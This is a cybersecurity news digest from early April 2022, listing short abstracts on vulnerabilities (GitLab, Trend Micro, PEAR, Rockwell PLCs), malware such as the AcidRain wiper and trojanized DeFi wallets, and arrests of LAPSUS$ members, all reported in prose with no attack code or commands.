Scammers are Exploiting Ukraine Donations Full Text

Abstract Scammers are exploiting the current events in Ukraine especially after the official Ukrainian Twitter account tweeted Bitcoin and Ethereum wallet addresses for donations.

McAfee

April 2, 2022 – Breach

Ukraine intelligence leaks names of 620 alleged Russian FSB agents Full Text

Abstract The Ukrainian Defense Ministry’s Directorate of Intelligence leaked personal data belonging to 620 alleged Russian FSB agents. The Ukrainian Defense Ministry’s Directorate of Intelligence has leaked the alleged personal data of 620 Russian FSB officers....

Security Affairs

April 2, 2022 – Malware

WordPress Popunder Malware Redirects to Scam Sites Full Text

Abstract The malware is always injected into the active theme’s footer.php file, and contains obfuscated JavaScript after a long series of empty lines in an attempt to stay hidden.

Security Boulevard

April 2, 2022 – Vulnerabilities

Critical CVE-2022-1162 flaw in GitLab allowed threat actors to take over accounts Full Text

Abstract GitLab has addressed a critical vulnerability, tracked as CVE-2022-1162 (CVSS score of 9.1), that could allow remote attackers to take over user accounts. The CVE-2022-1162 vulnerability is related to the set of hardcoded static passwords during...

Security Affairs

April 2, 2022 – Vulnerabilities

Trend Micro fixed high severity flaw in Apex Central product management console Full Text

Abstract Trend Micro has fixed a high severity arbitrary file upload flaw, tracked as CVE-2022-26871, in the Apex Central product management console. Cybersecurity firm Trend Micro has addressed a high severity security flaw, tracked as CVE-2022-26871, in the Apex...

Security Affairs

April 01, 2022 – Vulnerabilities

15-Year-Old Bug in PEAR PHP Repository Could’ve Enabled Supply Chain Attacks Full Text

Abstract A 15-year-old security vulnerability has been disclosed in the PEAR PHP repository that could permit an attacker to carry out a supply chain attack, including obtaining unauthorized access to publish rogue packages and execute arbitrary code. "An attacker exploiting the first one could take over any developer account and publish malicious releases, while the second bug would allow the attacker to gain persistent access to the central PEAR server," SonarSource vulnerability researcher Thomas Chauchefoin  said  in a write-up published this week. PEAR, short for PHP Extension and Application Repository, is a framework and distribution system for reusable PHP components. One of the issues, introduced in a  code commit  made in March 2007 when the feature was originally implemented, relates to the use of the cryptographically insecure  mt_rand()  PHP function in the password reset functionality that could allow an attacker to "discover a valid password reset token in les

The Hacker News

April 01, 2022 – Hacker

British Police Charge Two Teenagers Linked to LAPSUS$ Hacker Group Full Text

Abstract The City of London Police on Friday disclosed that it has charged two of the seven teenagers, a 16-year-old and a 17-year-old, who were arrested last week for their alleged connections to the LAPSUS$ data extortion gang. "Both teenagers have been charged with: three counts of unauthorized access to a computer with intent to impair the reliability of data; one count of fraud by false representation and one count of unauthorized access to a computer with intent to hinder access to data," Detective Inspector Michael O'Sullivan, from the City of London Police,  said  in a statement. In addition, the unnamed 16-year-old minor has been charged with one count of causing a computer to perform a function to secure unauthorized access to a program. The charges come as the City of London Police moved to arrest seven suspected LAPSUS$ gang members aged between 16 and 21 on March 25, with the agency  telling  The Hacker News that all the individuals had been subsequently "re

The Hacker News

April 01, 2022 – Vulnerabilities

GitLab Releases Patch for Critical Vulnerability That Could Let Attackers Hijack Accounts Full Text

Abstract DevOps platform GitLab has released software updates to address a critical security vulnerability that, if potentially exploited, could permit an adversary to seize control of accounts. Tracked as  CVE-2022-1162 , the issue has a CVSS score of 9.1 and is said to have been discovered internally by the GitLab team. "A hardcoded password was set for accounts registered using an  OmniAuth provider  (e.g., OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts," the company  said  in an advisory published on March 31. GitLab, which has addressed the bug with the latest release of versions 14.9.2, 14.8.5, and 14.7.7 for GitLab Community Edition (CE) and Enterprise Edition (EE), also said it took the step of resetting the password of an unspecified number of users out of an abundance of caution. "Our investigation shows no indication that users or accounts have

The Hacker News

April 01, 2022 – Malware

Newly found Android malware records audio, tracks your location Full Text

Abstract A previously unknown Android malware uses the same shared-hosting infrastructure previously seen used by the Russian APT group known as Turla, though attribution to the hacking group not possible.

BleepingComputer

April 01, 2022 – Ransomware

The Week in Ransomware - April 1st 2022 - ‘I can fight with a keyboard’ Full Text

Abstract While ransomware is still conducting attacks and all companies must stay alert, ransomware news has been relatively slow this week. However, there were still some interesting stories that we outline below.

BleepingComputer

April 1, 2022 – Phishing

Phishing Attacks Target NATO and European Military Full Text

Abstract Google TAG found multiple cybercriminal activities, such as phishing and malware attacks, targeting NATO and Eastern European countries. An APT group adopted a novel Browser-in-the-Browser (BitB) phishing technique. A group with alleged links to China targeted government and military organizations ... Read More

Cyware Alerts - Hacker News

April 01, 2022 – Attack

Russian Wiper Malware Likely Behind Recent Cyberattack on Viasat KA-SAT Modems Full Text

Abstract The cyberattack aimed at Viasat that temporarily knocked KA-SAT modems offline on February 24, 2022, the same day Russian military forces invaded Ukraine, is believed to have been the consequence of wiper malware, according to the  latest research  from SentinelOne. The findings come as the U.S. telecom company  disclosed  that it was the target of a multifaceted and deliberate" cyberattack against its KA-SAT network, linking it to a "ground-based network intrusion by an attacker exploiting a misconfiguration in a VPN appliance to gain remote access to the trusted management segment of the KA-SAT network." Upon gaining access, the adversary issued "destructive commands" on tens of thousands of modems belonging to the satellite broadband service that "overwrote key data in flash memory on the modems, rendering the modems unable to access the network, but not permanently unusable." But SentinelOne said it uncovered a new piece of malware (named &qu

The Hacker News

April 1, 2022 – Government

Congress Invests in National Cyber Resilience but Misses Important Opportunities in the Consolidated Appropriations Act Full Text

Abstract The new appropriations bill is sound overall, but it addresses only half of the federal government’s cybersecurity mandate.

Lawfare

April 1, 2022 – Attack

Anonymous targets oligarchs’ Russian businesses: Marathon Group hacked Full Text

Abstract Anonymous continues its operations against Russia, the group announced the hack of the Russian investment firm Marathon Group. Anonymous continues to target Russian firms owned by oligarchs, yesterday the collective announced the hack of the Thozis...

Security Affairs

April 01, 2022 – Solution

Microsoft now lets you enable the Windows App Installer again, here’s how Full Text

Abstract Microsoft now allows enterprise admins to re-enable the MSIX ms-appinstaller protocol handler disabled after Emotet abused it to deliver malicious Windows App Installer packages.

BleepingComputer

April 1, 2022 – Malware

Verblecon: A New Advanced Malware Loader Full Text

Abstract A threat actor was spotted employing a sophisticated crypto-mining malware, dubbed Verblecon, on systems to steal access tokens for Discord chat app users. There are reports that connect a Verblecon domain to a ransomware attack as well. Organizations are recommended to use up-to-date and reli ... Read More

Cyware Alerts - Hacker News

April 01, 2022 – Vulnerabilities

Critical Bugs in Rockwell PLC Could Allow Hackers to Implant Malicious Code Full Text

Abstract Two new security vulnerabilities have been disclosed in Rockwell Automation's programmable logic controllers ( PLCs ) and engineering workstation software that could be exploited by an attacker to inject malicious code on affected systems and stealthily modify automation processes. The flaws have the potential to disrupt industrial operations and cause physical damage to factories in a manner similar to that of Stuxnet and the  Rogue7 attacks , operational technology security company Claroty said. "Programmable logic and predefined variables drive these [automation] processes, and changes to either will alter normal operation of the PLC and the process it manages," Claroty's Sharon Brizinov  noted  in a write-up published Thursday. The list of two flaws is below – CVE-2022-1161  (CVSS score: 10.0) – A remotely exploitable flaw that allows a malicious actor to write user-readable "textual" program code to a separate memory location from the executed c

The Hacker News

April 1, 2022 – Malware

AcidRain, a wiper that crippled routers and modems in Europe Full Text

Abstract Researchers spotted a new destructive wiper, tracked as AcidRain, that is likely linked to the recent attack against Viasat. Security researchers at SentinelLabs have spotted a previously undetected destructive wiper, tracked as AcidRain, that hit routers...

Security Affairs

April 01, 2022 – Privacy

Russian-linked Android malware records audio, tracks your location Full Text

Abstract A previously unknown Android malware has been linked to the Turla hacking group after discovering the app used infrastructure previously attributed to the threat actors.

BleepingComputer

April 1, 2022 – Ransomware

Hive Ransomware Ported to Rust, Encryptor Updated Full Text

Abstract Hive ransomware actors ported its Linux encryptor to Rust programming language to target VMware ESXi servers. Additionally, they have added new features to make it difficult for security researchers to snoop on victim’s ransom negotiations, which it appears to have copied from BlackCat. Organizatio ... Read More

Cyware Alerts - Hacker News

April 01, 2022 – Attack

Chinese Hackers Target VMware Horizon Servers with Log4Shell to Deploy Rootkit Full Text

Abstract A Chinese advanced persistent threat tracked as Deep Panda has been observed exploiting the  Log4Shell vulnerability  in VMware Horizon servers to deploy a backdoor and a novel rootkit on infected machines with the goal of stealing sensitive data. "The nature of targeting was opportunistic insofar that multiple infections in several countries and various sectors occurred on the same dates,"  said  Rotem Sde-Or and Eliran Voronovitch, researchers with Fortinet's FortiGuard Labs, in a report released this week. "The victims belong to the financial, academic, cosmetics, and travel industries." Deep Panda , also known by the monikers Shell Crew, KungFu Kittens, and Bronze Firestone, is said to have been active since at least 2010, with recent attacks "targeting legal firms for data exfiltration and technology providers for command-and-control infrastructure building,"  according  to Secureworks. Cybersecurity firm CrowdStrike, which assigned the panda

The Hacker News

April 1, 2022 – Vulnerabilities

Zyxel fixes a critical bug in its business firewall and VPN devices Full Text

Abstract Zyxel issued security updates for a critical vulnerability that affects some of its business firewall and VPN devices. Networking equipment vendor Zyxel has pushed security updates for a critical flaw, tracked as CVE-2022-0342 (CVSS 9.8), that affects...

Security Affairs

April 01, 2022 – Botnet

Beastmode botnet boosts DDoS power with new router exploits Full Text

Abstract A Mirai-based distributed denial-of-service (DDoS) botnet tracked as Beastmode (aka B3astmode) has updated its list of exploits to include several new ones, three of them targeting various models of Totolink routers.

BleepingComputer

April 1, 2022 – Vulnerabilities

GitLab addresses critical account hijack bug Full Text

Abstract GitLab has patched a critical vulnerability that meant static passwords were inadvertently set during OmniAuth-based registration – putting accounts at risk of malicious takeover.

The Daily Swig

April 01, 2022 – General

Results Overview: 2022 MITRE ATT&CK Evaluation – Wizard Spider and Sandworm Edition Full Text

Abstract Threat actor groups like Wizard Spider and Sandworm have been wreaking havoc over the past few years – developing and deploying cybercrime tools like Conti, Trickbot, and Ryuk ransomware. Most recently, Sandworm (suspected to be a Russian cyber-military unit) unleashed cyberattacks against Ukranian infrastructure targets. To ensure cybersecurity providers are battle ready, MITRE Engenuity uses real-world attack scenarios and tactics implemented by threat groups to test security vendors' capabilities to protect against threats – the MITRE ATT&CK Evaluation. Each vendor's detections and capabilities are assessed within the context of the  MITRE ATT&CK Framework. This year, they used the tactics seen in Wizard Spider and Sandworm's during their evaluation simulations. And MITRE Engenuity didn't go easy on these participating vendors. As mentioned before – the stakes are too high, and risk is growing. The 2022 results overview To think about it simply, this MITRE ATT&CK Ev

The Hacker News

April 1, 2022 – Government

CISA adds Sophos firewall bug to Known Exploited Vulnerabilities Catalog Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical Sophos firewall flaw and seven other issues to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA)...

Security Affairs

April 01, 2022 – Vulnerabilities

Trend Micro fixes actively exploited remote code execution bug Full Text

Abstract Japanese cybersecurity software firm Trend Micro has patched a high severity security flaw in the Apex Central product management console that can let attackers execute arbitrary code remotely.

BleepingComputer

April 1, 2022 – Vulnerabilities

Trend Micro Patches Apex Central Zero-Day Exploited in Targeted Attacks Full Text

Abstract Trend Micro this week announced patches for a high-severity arbitrary file upload vulnerability in Apex Central that has already been exploited in what appear to be targeted attacks.

Security Week

April 01, 2022 – Hacker

North Korean Hackers Distributing Trojanized DeFi Wallet Apps to Steal Victims’ Crypto Full Text

Abstract The North Korean state-backed hacking crew, otherwise known as the  Lazarus Group , has been attributed to yet another financially motivated campaign that leverages a trojanized decentralized finance (DeFi) wallet app to distribute a fully-featured backdoor onto compromised Windows systems. The app, which is equipped with functionalities to save and manage a cryptocurrency wallet, is also designed to trigger the launch of the implant that can take control of the infected host. Russian cybersecurity firm Kaspersky  said  it first encountered the rogue application in mid-December 2021. The infection scheme initiated by the app also results in the deployment of the installer for a legitimate application, which gets overwritten with a trojanized version in an effort to cover its tracks. That said, the initial access avenue is unclear, although it's suspected to be a case of social engineering. The spawned malware, which masquerades as Google's Chrome web browser, subsequently

The Hacker News

April 1, 2022 – Vulnerabilities

Flaws in Wyze cam devices allow their complete takeover Full Text

Abstract Wyze Cam devices are affected by three security vulnerabilities that can allow attackers to takeover them and access camera feeds. Bitdefender researchers discovered three security vulnerabilities in the popular Wyze Cam devices that can be exploited...

Security Affairs

April 01, 2022 – Vulnerabilities

Critical GitLab vulnerability lets attackers take over accounts Full Text

Abstract GitLab has addressed a critical severity vulnerability that could allow remote attackers to take over user accounts using hardcoded passwords.

BleepingComputer

April 1, 2022 – Insider Threat

NSA employee indicted for ‘leaking top secret defense info’ Full Text

Abstract The United States Department of Justice (DoJ) has accused an NSA employee of sharing top-secret national security information with an unnamed person who worked in the private sector.

The Register

April 01, 2022 – Breach

Sitel on Okta breach: “spreadsheet” did not contain passwords Full Text

Abstract Okta's outsourced provider of support services, Sitel (Sykes) has shared more information this week in response to the leaked documents that detailed the various incident response tasks carried out by Sitel after the Lapsus$ hack.

BleepingComputer

April 1, 2022 – Outage

Modem-wiping malware caused Viasat broadband outage Full Text

Abstract Tens of thousands of Viasat satellite broadband modems that were disabled in a cyber-attack some weeks ago were wiped by malware with possible links to Russia's destructive VPNFilter, according to SentinelOne.

The Register

More

Table of contents